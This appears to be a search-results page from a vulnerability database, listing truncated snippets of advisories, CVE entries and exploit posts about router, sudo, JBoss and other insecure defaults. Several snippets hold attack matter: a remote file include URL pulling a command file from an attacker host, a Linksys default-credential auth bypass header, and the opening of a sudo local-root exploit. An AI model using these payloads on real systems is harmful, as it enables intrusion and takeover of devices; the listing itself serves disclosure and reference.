660 matches found
Low: Red Hat Bug Fix Advisory: util-linux bug-fix update
An updated util-linux package that fixes multiple bugs is now available. The util-linux package contains a large variety of low-level system utilities that are necessary for a Linux system to function. Among others, util-linux contains the fdisk configuration tool and the login program. This upda...
Sudo <= 1.6.9p18 (Defaults setenv) Local Privilege Escalation Exploit
No description provided by source. !/bin/sh Sudo = 1.6.9p18 local r00t exploit by Kingcope/2008/www.com-winner.com Most lame exploit EVER! Needs a special configuration in the sudoers file: --- "Defaults setenv" so environ vars are preserved : --- May also need the current users password to be...
[SECURITY] Fedora 7 Update: gnome-screensaver-2.18.2-4.fc7
gnome-screensaver is a screen saver and locker that aims to have simple, sane, secure defaults and be well integrated with the desktop...
Linksys WRT54G Firmware 1.00.9 - Security Bypass (1)
regurgitated by: meathive url: kinqpinz.info ; Tue, 05 Feb 2008 07:51:41 -0700 CVE-2008-1247 WRT54G firmware version: v1.00.9 Default LAN IP: 192.168.1.1 Default auth: user:blank - pass:admin Authorization: Basic OmFkbWlu php print base64decode"OmFkbWlu"; :admin https://kinqpinz.info/lib/wrt54g/...
Linksys WRT54G (firmware 1.00.9) Security Bypass Vulnerabilities
Exploit for hardware platform in category remote exploits ================================================================ Linksys WRT54G firmware 1.00.9 Security Bypass Vulnerabilities ================================================================ regurgitated by: meathive url: kinqpinz.info ;...
Linksys WRT54G Firmware 1.00.9 - Security Bypass (1)
Linksys WRT54G Firmware 1.00.9 - Security Bypass 1 regurgitated by: meathive url: kinqpinz.info ; Tue, 05 Feb 2008 07:51:41 -0700 CVE-2008-1247 WRT54G firmware version: v1.00.9 Default LAN IP: 192.168.1.1 Default auth: user:blank - pass:admin Authorization: Basic OmFkbWlu php print...
CVE-2007-6708
Multiple cross-site request forgery CSRF vulnerabilities on the Cisco Linksys WAG54GS Wireless-G ADSL Gateway with 1.01.03 and earlier firmware allow remote attackers to perform actions as administrators via an arbitrary valid request to an administrative URI, as demonstrated by 1 a Restore Facto...
CVE-2007-6708
Multiple cross-site request forgery CSRF vulnerabilities on the Cisco Linksys WAG54GS Wireless-G ADSL Gateway with 1.01.03 and earlier firmware allow remote attackers to perform actions as administrators via an arbitrary valid request to an administrative URI, as demonstrated by 1 a Restore Facto...
Cross site request forgery (csrf)
Multiple cross-site request forgery CSRF vulnerabilities on the Cisco Linksys WAG54GS Wireless-G ADSL Gateway with 1.01.03 and earlier firmware allow remote attackers to perform actions as administrators via an arbitrary valid request to an administrative URI, as demonstrated by 1 a Restore Facto...
CVE-2007-6708
Multiple cross-site request forgery CSRF vulnerabilities on the Cisco Linksys WAG54GS Wireless-G ADSL Gateway with 1.01.03 and earlier firmware allow remote attackers to perform actions as administrators via an arbitrary valid request to an administrative URI, as demonstrated by 1 a Restore Facto...
autofs defaults don't restrict suid in /net
The default configuration of autofs 5 in some Linux distributions, such as Red Hat Enterprise Linux RHEL 5, omits the nosuid option for the hosts /net filesystem map, which allows local users to gain privileges via a setuid program on a remote NFS server...
Festival for Linux weak defaults
In default ocnfiguration, it's possible to access local service and execute command with root privileges withou password...
Vonage VoIP phones weak defaults
Administrative interface in available via WAN connection with username/password of user/user...
JBoss insecure defaults
Web console and management instruments are available without authentication...
Critical thunderbird security update
1.5.0.8-0.1.1.el4 - defaults changed to oracle... 1.5.0.8-0.1.el4 - Update to 1.5.0.8 RC 1.5.0.7-0.1.el4 - Update to 1.5.0.7 1.5.0.5-0.el4.2 - Fix the launcher and icons 1.5.0.5-0.el4.1 - Update to 1.5.0.5...
phpmydir1044.txt
ENGLISH Title : phpMyDirectory = 10.4.4 Multiple Remote File Include Vulnerabilities Dork : "powered by phpmydirectory" Author : ajann greetz : Nukedx,TheHacker Exploit; http://target/path/template/default/footer.php?ROOTPATH=http://yourhost.com/cmd.txt?cmd=ls...
CVE-2005-3177
CHKDSK in Microsoft Windows 2000 before Update Rollup 1 for SP4, Windows XP, and Windows Server 2003, when running in fix mode, does not properly handle security descriptors if the master file table contains a large number of files or if the descriptors do not satisfy certain NTFS conventions,...
SMCwhoops.txt
Tested Model: 7008ABR part number 750.9814 with firmware 1.032 installed Confirmed by another person on: 7004VBR version 1, firmware 1.231 Others may be vulnerable. SMC broadband routers ship with remote administration enabled by default on their port 1900 on the WAN side of the router. If you ju...
ALERT: Xitami 2.5b5
I have notified iMatix via [email protected] of multiple flaws in the GSL templates of Xitami 2.5 Beta. The e-mail was sent out today, so I will release technical details later on, but I did want to release a workaround: In defaults.cfg, users can set "use-error-script" in the "Server" section t...
February 16, 2021—KB4601380 (OS Build 18363.1411) Preview
February 16, 2021—KB4601380 OS Build 18363.1411 Preview NEW 2/16/21 IMPORTANT As part of the end of support for Adobe Flash, KB4577586 is now available as an optional update from Windows Update WU and Windows Server Update Services WSUS. Installing KB4577586 will remove Adobe Flash Player...